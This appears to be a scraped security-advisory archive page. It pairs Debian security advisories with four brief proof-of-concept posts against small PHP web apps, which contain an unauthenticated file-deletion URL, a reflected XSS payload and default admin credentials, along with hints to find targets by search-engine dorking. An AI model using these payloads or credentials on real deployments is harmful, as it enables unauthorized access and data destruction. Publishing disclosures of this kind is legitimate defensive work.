File Management System version 1.0 suffers from an insecure direct object reference vulnerability.

**File Management System 1.0 Insecure Direct Object Reference**

Posted Sep 6, 2024

Authored by indoushka

File Management System version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 80d45521f02111223db9c15921f68ebb49c243151cc2e7da343578636283f910

Download | Favorite | View

**File Management System 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : File Management System 1.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Payload enables deletion of uploaded files from admin control panel without login.[+] use payload : /Private_Dashboard/delete.php?ID=5[+] 127.0.0.1/demo/Private_Dashboard/delete.php?ID=5Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,685)
*   Arbitrary (17,036)
*   BBS (2,859)
*   Bypass (1,902)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,203)
*   Encryption (2,393)
*   Exploit (54,137)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (917)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,207)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,401)
*   Protocol (3,749)
*   Python (1,654)
*   Remote (31,825)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,041)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,700)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,054)
*   Web (10,130)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,117)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,066)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,731)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,807)
*   UNIX (9,449)
*   UnixWare (187)
*   Windows (6,762)
*   Other

File Management System 1.0 Insecure Direct Object Reference

Debian Linux Security Advisory 5766-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5766-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonSeptember 05, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-7970 CVE-2024-8362Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 128.0.6613.119-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmbZZHQACgkQZF0CR8NudjdsQRAAiFbc3LsuiQ8pvOalXN4w1A9lgG95YZ7DH5+02gV6N/M83jIVQvrfffVgdUNTkHP+GrjNBFjTf4kMaufj0dxe75KX8IYBm+t4+7Naivlgkjz1YQhY7fbQdQzzMZXtID7xyU3qEEutO+0hJ+P/Sf/CoXkP7aEzkNMaiZfSzLp1W98/jIwHfkUlBAx2L6EQSq3UEjT0wml53x+uOxISObgHxTE0irbXH4k4Z/lXO5xtm416auxPe1WuLQoMtd1xH4iUyVfVwLcdbkSsa3j0KGZwquQz2QlChzSxvzLF4Bp4pVlNIGwSE3rW8+FFTzaQ5hipK2InzfGPFpS2wxPwFOIRf/qHx6MnlY7gTULr0U8UCWqdHuzCmGxlY/RCNvmuo8yqp8O5ERosW5DzqL/duid37pFbHNVp33wQ17/9y51lBe1XktZWqOELB2lhRN64R1dlWvGJErLM3+/xAsX5c0DX6CPoHN/ak/xKf5nnManRD3rlcgkHlVPvsewokGOhptKjvM3gm6Iw08ywEfLAMW/nAaoOkjhXk2AvgYQKUwSEmmiwY+wwQcb+zgc3hNQ/as5C4j13Xl19N7RpW6HqxSqH9tEp9mOJgzDe5kOExMpUJ6J2w74QPfp3galwH0rdrCdy7+zGSDB0nHDqqTjWBc5/AjG1q1b6t1gC2gt0w3jCHMc==TQbe-----END PGP SIGNATURE-----

Debian Security Advisory 5766-1

Debian Linux Security Advisory 5765-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5765-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 04, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-8381 CVE-2024-8382 CVE-2024-8383 CVE-2024-8384Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode.For the stable distribution (bookworm), these problems have been fixed inversion 115.15.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbX9bEACgkQEMKTtsN8Tjbwzg/7BRH1FshkIoqMreCmhj9AYevh3VmSLDqcUOVU0a2LrLOqcJCsRIyhhrl5BXxGt0w9Q1KOIYBlwSsRU+EAlcwlh6+1FyKqrAcc8SDN+klK7NekODMHXj4gzge3adyaVYoYpHNhfYt+aVwZD+XTrI0d64V9HsO7Jsa9bwyI+xelgxuFfb8061L4q+ViQgzyCrl+vjaS6doRK5gZCVjPeuaFPKbppO5VIapF2/RIqDqZOCrziSONeqTaw7IRPITMnEHEl/+hPK9qQOmyw/suEES/Cl7aagj5znd8pQVvwpMMql/soAGX96G+y/2dC0s4cgaxwN6JAyRao7tFbCTjHpbxK+hy6pXcEBnrMPZ79plaZQ7L5uEMX6OxgEtRWGRA10Nti1RxRT48bgx8o8BnQ7K7lIHJn8afXb5pTf9rwezRyvy0UrCHAtta6Z2galVPrb5tbPBLt8MrS0cPd+RYj1M8wgrVnxCIa8N4qHLtw0adiyZa32e+lwtCbOhMQarAobD3zFGKBJsd0/lzKjeQHgIX3hRmZ57TOAgqRR6M91bbtxpDg+dGrxMUiqV/+fF7oB3WsR4KgXJCO+1YR7khOlWieTl+2Uf/w3PT0BBE4smJ9SAa+ZZuGZFyVVdmWRP2hy3OR5h7Hpe3po59/TzMlIcm6TdhYKUp0q/ANPKFS0cu9Ks==YiPV-----END PGP SIGNATURE-----

Debian Security Advisory 5765-1

Debian Linux Security Advisory 5764-1 - David Benjamin reported a flaw in the X.509 name checks in OpenSSL, a Secure Sockets Layer toolkit, which may cause an application performing certificate name checks to crash, resulting in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5764-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoSeptember 03, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : opensslCVE ID         : CVE-2024-6119David Benjamin reported a flaw in the X.509 name checks in OpenSSL, aSecure Sockets Layer toolkit, which may cause an application performingcertificate name checks to crash, resulting in denial of service.Additional details can be found in the upstream advisory:https://openssl-library.org/news/secadv/20240903.txtFor the stable distribution (bookworm), this problem has been fixed inversion 3.0.14-1~deb12u2.We recommend that you upgrade your openssl packages.For the detailed security status of openssl please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/opensslFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmbXW1pfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0RXThAAjRoSSUyNd4LR8nETi9XB31OkPVx0KrvU2hfIRnPUHHb3hOoi8vEKxdqhgd1pHtEKUBB3TBkXnyMuQ1p79+wuIjvV6Jr7uEPK0w2GdvC0KaF4+cohRDB7Xpjk+AjVFprvljePzgR9BcX1LWX/Bj6k7j8Jit4hkSDxeWn2W4NvCk9+1FMaHPa1PCmXAxo83qzlJg/SMcI5s19No3TzY9z9RdXH622J6hZk/DUZi6YMSryxCoAuU7ur/Ol8zGH8RG9THiC4hcnAnNjOrqAJqlLzoLgFxykwrvYGwWk//fsQsCeR2HXNQJiPBKq0QyoXP0WFgIbjnQlRfJI2gxwr5KWn77sNnc2vGZ8HXScj+pKOxrdHyp6a3kaZ99ANDCU5UAo36wSUhZyX9I8nNxjZmb2w5fbeFnHkI2xx2onoLeUjv4hzipS4VS0OP5ThqXhXGjLng4L0bIc5Ad/LuC4T/PnXuwfDgMnAQHHM0zjQcDih/TaTfXn1v+j67FIVBxiqD5EI07ms/jysbmpydB4z2Fwl0D09goEtbO2m2ZE+BU4o8dQIk6UB7KiKTBcyVS3uTR7ZG9AbomfHceh9/3ycI0FMTXUXlifU9v3Btuwpb3DnjCwJKaoAEQNrfuV1OjqV29oZd2ye2bwAC2uveAnS0wxe+26Gsr+PhmdUFSGSAPeULt4==KHr5-----END PGP SIGNATURE-----

Debian Security Advisory 5764-1

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

**Taskhub 2.8.8 Insecure Settings**

Posted Sep 3, 2024

Authored by indoushka

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 2c385d7b29ff2d1f0cadb673bff0447f2a27c839cc502710002b3eab58740544

Download | Favorite | View

**Taskhub 2.8.8 Insecure Settings**

    =============================================================================================================================================| # Title     : Taskhub v2.8.8 Insecure Settings Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 12345678[+] https://www/127.0.0.1/tasks.octalfoxcom/auth/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,625)
*   Arbitrary (17,028)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,868)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,420)
*   DoS (25,190)
*   Encryption (2,389)
*   Exploit (54,101)
*   File Inclusion (4,271)
*   File Upload (1,007)
*   Firewall (822)
*   Info Disclosure (2,911)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,252)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,205)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,652)
*   Remote (31,810)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,693)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,048)
*   Web (10,128)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,278)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,006)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,685)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,797)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,757)
*   Other

Taskhub 2.8.8 Insecure Settings

Debian Linux Security Advisory 5762-1 - The WebKitGTK web engine suffers from multiple vulnerabilities. An anonymous researcher discovered that processing maliciously crafted web content may lead to an unexpected process crash. Huang Xilin discovered that processing maliciously crafted web content may lead to an unexpected process crash. Huang Xilin discovered that processing maliciously crafted web content may lead to an unexpected process crash. More issues are listed in this advisory.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5762-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
August 30, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-4558 CVE-2024-40776 CVE-2024-40779 CVE-2024-40780  
                 CVE-2024-40782 CVE-2024-40785 CVE-2024-40789 CVE-2024-40794

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-4558

    An anonymous researcher discovered that processing maliciously  
    crafted web content may lead to an unexpected process crash.

CVE-2024-40776

    Huang Xilin discovered that processing maliciously crafted web  
    content may lead to an unexpected process crash.

CVE-2024-40779

    Huang Xilin discovered that processing maliciously crafted web  
    content may lead to an unexpected process crash.

CVE-2024-40780

    Huang Xilin dicovered that processing maliciously crafted web  
    content may lead to an unexpected process crash.

CVE-2024-40782

    Maksymilian Motyl discovered that processing maliciously crafted  
    web content may lead to an unexpected process crash.

CVE-2024-40785

    Johan Carlsson discovered that processing maliciously crafted web  
    content may lead to a cross site scripting attack.

CVE-2024-40789

    Seunghyun Lee discovered that processing maliciously crafted web  
    content may lead to an unexpected process crash.

CVE-2024-40794

    Matthew Butler discovered that private Browsing tabs may be  
    accessed without authentication.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.44.3-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmbR5W8ACgkQAAyEYu0C  
2ALznQ//bOsY+Xe6T18/q0zsHnyvCV/jxwfjrCUF+OVlulP5LJlrD6uQBdqMr5Jk  
9cRcS+qxc/lnqOGU12+MSc2tfvn9XSl5dqZFTHxCH4ztWDjNBzxKrHk82RIkAQ9p  
UVzrslRIVrZKlqbeBOCIlJSzc6GEJi5Msxy/4lnSbQ380WGfWQ26mplmgnLQgOL1  
OIInHO8VAonPU2I4v4G+BZA1lEKOsoJqXxdg8hsgyBiP4CDcxrpeN6SrPMARUObX  
CAsj+jsm4v8Bj7Wd8KvV4W3H137YmyrjPghWQwgmvyf+rvR1JjDwcXBTuAPv4HTC  
FQAFbVLoeQSLSpMO3b2oQ0s9f8o93/gbc4n7WyTYac/6IzxT/oH9uKwQABzWBg6C  
qcUBgJ1Z7rx9/PgQjWeT7uZdJkT7o7Eux2wtzud82jTM5goOCCqpZo93D35txiIu  
sRMoCaszdH65TJxLjPrJFargLw7x2kN0RJUAK167tnEsX56TWIGF+K7BQAr1YpS1  
mf3+2VC632yp5MXoejBsGDE4bH1OlgKF8xEs13V2LTb3w1ursC046LcOHLURIwX1  
+Cw49Pe6A0nhyv5raUaBzGvV9DbptTM+in8nCI4YXKlcQA87MjOORdVUnW1HWzZe  
PiRFGBay5dgSJW9ebTwVJQxNd2QKWZrLRDOLDhJuucxIZf+Fsb8=  
=SAKx  
-----END PGP SIGNATURE-----

Debian Security Advisory 5762-1

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

Posted Sep 2, 2024

Authored by indoushka

Online Musical Instrument Shop IN version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 2e3a9e009b49f67ad6f0534a437aba16431617d1d2588b6c4ed1087d4399d493

Download | Favorite | View

**Online Musical Instrument Shop IN 1.0 Cross Site Scripting**

    ====================================================================================================================================================| # Title     : Online Musical Instrument Shop IN v1.0 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                                   || # Vendor    : https://download-media.code-projects.org/2020/04/Online_Musical_Instrument_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |====================================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.'"()%26%25<acx><ScRiPt >prompt(925772)</ScRiPt>[+] Panel : http://127.0.0.1/ecommerce/admin_area/login.php?not_admin=You%2520are%2520not%2520Admin.%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(925772)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Online Musical Instrument Shop IN 1.0 Cross Site Scripting

Debian Linux Security Advisory 5763-1 - William Khem-Marquez discovered that Pymatgen, a Python library for materials analysis, could be tricked into running arbitrary code if a malformed CIF file is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5763-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 30, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : pymatgenCVE ID         : CVE-2024-23346William Khem-Marquez discovered that Pymatgen, a Python library formaterials analysis, could be tricked into running arbitrary code if amalformed CIF file is processed.For the stable distribution (bookworm), this problem has been fixed inversion 2022.11.7+dfsg1-11+deb12u1.We recommend that you upgrade your pymatgen packages.For the detailed security status of pymatgen please refer toits security tracker page at:https://security-tracker.debian.org/tracker/pymatgenFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbSCEcACgkQEMKTtsN8TjaJDxAAke20viDFhNtKyuwC3JuvZHI5Ql0l+4vS0HmHvAQcaV7JVMtnUWpmMHuC/xK6gqhPzfubWnvOBjXCgxSR6ubE+eY68WXiWQ4qPs96lHgZyAZOpbPbgrlBW+igYGtBfT9MJMwcWbXNlAHdfWxWA+DQrnEFB/TuYA9UgN1qINBkvQxiRwPFvATX00S3ds31Noic3as8OmaWEpG+xcLVLwrX5/UCz7csmkvUjRYf1oqtTQH2SlAlHAX5i55TmL0MbK39JuVD3CxSBH4OH7f6PastJFoVUIx6c3ZDrxZPZZ1wNSdaLdGYVCUF6DihZR/5LkjH5MmRBq0ZCQSLq4AWLjcKRsJnhu0soVXfI7yn3oc58yqqG3ruqjIlrbhFZkm5Fj7jeNuX+aSEFw4vd1bHwGCO7g+EAbQ4MWYYP0EsyXtN5X3O/v4MgkF4WK1To+TqG+SjB7hwV7Crdui0Iv89eZCGfsMnpRWvXwdnzOIfjgPBWXQkgPqDEDj8q4LkpQGdy/gCr772I79hkuqH0AhpzWZmSlwGU5NRBu09OAiVxXADScMfyggsteWriSBPv+zkZb4s+c8zNUjVdO4mcJIsOaT0FLncj4gUS0Eo5/vsb1QZMEsznp8Lrru1PAKKUvpYhzxoK/Y5ecovFFkHnXIc0qPhPOlvSpxpAURr5l2PEiALQNI==ZU7M-----END PGP SIGNATURE-----

Debian Security Advisory 5763-1

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Loan Management System 2024 1.0 Insecure Settings**

Posted Sep 2, 2024

Authored by indoushka

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4e37e483991ec7b37ab54ed035920c62f7033979ca509714b26270c8fabb131b

Download | Favorite | View

**Loan Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Loan Management System 2024 v1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin[+] https://www/127.0.0.1/165.232.176.12/index.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Loan Management System 2024 1.0 Insecure Settings

Debian Linux Security Advisory 5761-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5761-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonAugust 29, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-7969 CVE-2024-8193 CVE-2024-8194 CVE-2024-8198Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 128.0.6613.113-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmbRHeAACgkQZF0CR8NudjdiRA/9HmOr5Ptx9ykaQPZsUQolr3OR0gSDNgQtLYVYEWo/Zag3EDlRDDXXC5FKG+ujkWMF9w2OwZjR8j8dH0TFvz/xyI5gM7CdyDMv3FnM0afLaEASkv8EBAW5MLVdOcScfh+TRFrL7XvMW3SN4WtjSJzXiHSaYqrLBfstFy9wfjbQlnoldi6P4jJYuUiTOFb375FkmmjAs7eDF9qeuTvg2Fv2DZxdGJN52hl/saMhfTq46TEWcUTVpgxvXZMbB7T4bwn0FLCs9VGWmI27fO4F+AHT3HQgUTlubxdJvMQ/Z1aMZyQHA4xukVcRFfzHj/EzoWjGXjZe59TQx3QOADVUfVOdS4/mCG+rHhXlj3Hh3U7FrQP/SPCXZ6zcZBrNSG22EJUj3vMrlCikCZau4+0ZnlSfwAKYYenRi3qbfsv0t3Rx7XVRo2vTPVXka5T5NugdFykRdz1cTa0Y/ZllwdAh9yDQ1uFLM9k5xkGprm5yANEn//LUoM1oVviGwMF1oNHxJdupUO3diwu+Uc2GwLChjF9C0ISQYQMVx0SC3JhS41F9eKGamdzoHvJ/S4n8dDiveHlEJ8Np8Eiu3Pw+MRMNFEuBIr2Ets991gofe7WaafPu8SEV7wCbm/hUm6kl4hikcYQLO4d5v1yTOmxPBW03EpZSpBOF7DIOaj7EsWRohuUrMig==5K+x-----END PGP SIGNATURE-----

Tag

#debian